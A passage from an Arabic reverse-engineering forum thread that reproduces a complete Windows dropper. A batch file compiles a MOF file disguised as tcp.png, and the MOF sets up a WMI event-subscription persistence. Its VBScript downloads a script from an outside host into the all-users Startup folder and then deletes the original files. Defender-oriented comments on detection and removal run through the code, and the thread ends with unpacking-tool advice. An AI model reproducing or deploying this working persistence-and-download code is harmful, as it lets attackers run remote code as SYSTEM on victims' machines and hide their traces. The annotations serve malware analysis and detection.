12-03-2022, 10:18 PM
(21-02-2022, 09:03 AM)abu_youssef كتب : هل جربت فكها؟
R.bat
REM R.bat - installer stage for the WMI event-subscription persistence defined in tcp.png (a MOF file).
REM Defender's view: every step here needs administrative rights (compiling into root\subscription,
REM and the consumer later writes to the all-users Startup folder); it runs once and removes itself.
REM A mofcomp.exe launch from a user-writable directory against a non-.mof file name is a
REM high-signal detection (process-creation telemetry: Sysmon Event ID 1 / Security 4688).
set mypath=%cd%
REM Effectively a no-op: defines a variable literally named "tcp " (trailing space) with the current
REM value of the tcp variable, normally empty. Reads as filler rather than intent.
set tcp = %tcp%
REM mofcomp ignores the file extension; tcp.png is plain-text MOF. Because the MOF carries
REM "#pragma AUTORECOVER", mofcomp also copies it into System32\wbem\AutoRecover and lists it in the
REM CIMOM "Autorecover MOFs" registry value - both survive the deletions below and are where a
REM responder can recover the original MOF after the file is gone.
mofcomp tcp.png
REM Anti-forensic cleanup of the MOF and this script. The subscription itself lives in the WMI
REM repository and the AutoRecover store, so deleting these files does not remove the persistence;
REM the filter, consumer and binding objects in root\subscription must be deleted explicitly.
del %mypath%\tcp.png
del %mypath%\R.bat
exit
TCP.png
// AUTORECOVER makes mofcomp store a copy of this file in System32\wbem\AutoRecover (and list it in the
// CIMOM "Autorecover MOFs" registry value) so the objects are re-created if the repository is rebuilt.
// For a responder this copy is the durable artifact once the dropper has deleted tcp.png.
#pragma AUTORECOVER
// root\subscription holds permanent event subscriptions (filter / consumer / binding); writing here
// requires administrative rights. Creation of the three objects below is logged by Sysmon
// Event IDs 19, 20 and 21 and by Microsoft-Windows-WMI-Activity/Operational Event ID 5861.
#pragma namespace ("\\\\.\\root\\subscription")
// Permanent event consumer. Once bound to the filter below, the VBScript in ScriptText is executed by
// the WMI scripting host (scrcons.exe) under the LocalSystem account every time the filter fires.
// The generic Name is chosen to blend in; enumerate with
//   Get-WMIObject -Namespace root\subscription -Class ActiveScriptEventConsumer
instance of ActiveScriptEventConsumer as $Cons
{
Name = "Microsoft";
ScriptingEngine = "VBScript";
// Adjacent string literals concatenate into one script. What it does, line by line:
//   1. Microsoft.XMLHTTP issues a synchronous GET to the hard-coded URL (the page lists it as the
//      staging link; treat it as an IoC);
//   2. an ADODB.Stream with .type = 1 (adTypeBinary) receives the response body;
//   3. .savetofile ..., 2 (adSaveCreateOverWrite) writes it as updata.vbs into the all-users Startup
//      folder ("C:\Users\All Users" is the junction to ProgramData), so the payload also runs at every
//      interactive logon - a second, file-based persistence layered on top of the WMI one.
// Each trigger re-downloads and overwrites the file, so the served payload can change server-side.
// Mitigation / detection: alert on scrcons.exe making network connections or spawning processes,
// monitor writes to the common Startup folder, and remove all three root\subscription objects together.
ScriptText = "Function test() \n"
"dim xHttp \n"
" Set xHttp = createobject(\"Microsoft.XMLHTTP\") \n"
"dim bStrm\n"
"Set bStrm = createobject(\"Adodb.Stream\") \n"
"xHttp.Open \"GET\", \"https://boostcp.000webhostapp.com/msgbox.vbs\", False \n"
"xHttp.Send \n"
"with bStrm \n"
".type = 1 \n"
".open \n"
".write xHttp.responseBody \n"
".savetofile \"C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updata.vbs\", 2 \n"
"end with \n"
"end function \n"
"test\n";
};
// Trigger: polls every second (WITHIN 1) for new Win32_Process instances named explorer.exe, i.e. it
// fires at each desktop logon and whenever Explorer is restarted. An intrinsic-event poll on
// Win32_Process at this rate is rare in legitimate subscriptions and is a well-known persistence tell.
instance of __EventFilter as $Filt
{
Name = "EF";
EventNamespace = "root\\cimv2";
QueryLanguage = "WQL";
// Adjacent literals concatenate into a single WQL query.
Query = "SELECT * FROM __InstanceCreationEvent "
"WITHIN 1 WHERE TargetInstance ISA 'Win32_Process' "
"AND TargetInstance.Name = 'explorer.exe'";
};
// The binding is what activates the subscription; the filter and consumer alone are inert.
// Remediation must delete this object as well as $Filt and $Cons, e.g.
//   Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding | Remove-WMIObject
// Its creation is recorded by Sysmon Event ID 21 and WMI-Activity/Operational Event ID 5861.
instance of __FilterToConsumerBinding
{
Filter = $Filt;
Consumer = $Cons;
};
msgbox
Link:
https://boostcp.000webhostapp.com/msgbox.vbs
Message: msgbox "Risk"
(11-02-2022, 08:26 AM)abu_youssef كتب : استخدمت de4dot بكل اصداراته ولم استطع فك الحماية
لا ينفع لأن البرنامج ليس مبرمجاً بـ: C# / .Net
(11-02-2022, 08:26 AM)abu_youssef كتب : ما هي الأدوات المطلوبة لفك الحماية؟
OllyDbg
لإيجاد نقطة الدخول الأصلية (OEP)
ImpREC (Import Reconstructor)
عمل dump ثم إصلاح جدول الدوال المستوردة (IAT)
" اللهم أحسن خاتمتنا وأخرجنا من الدنيا علي خير"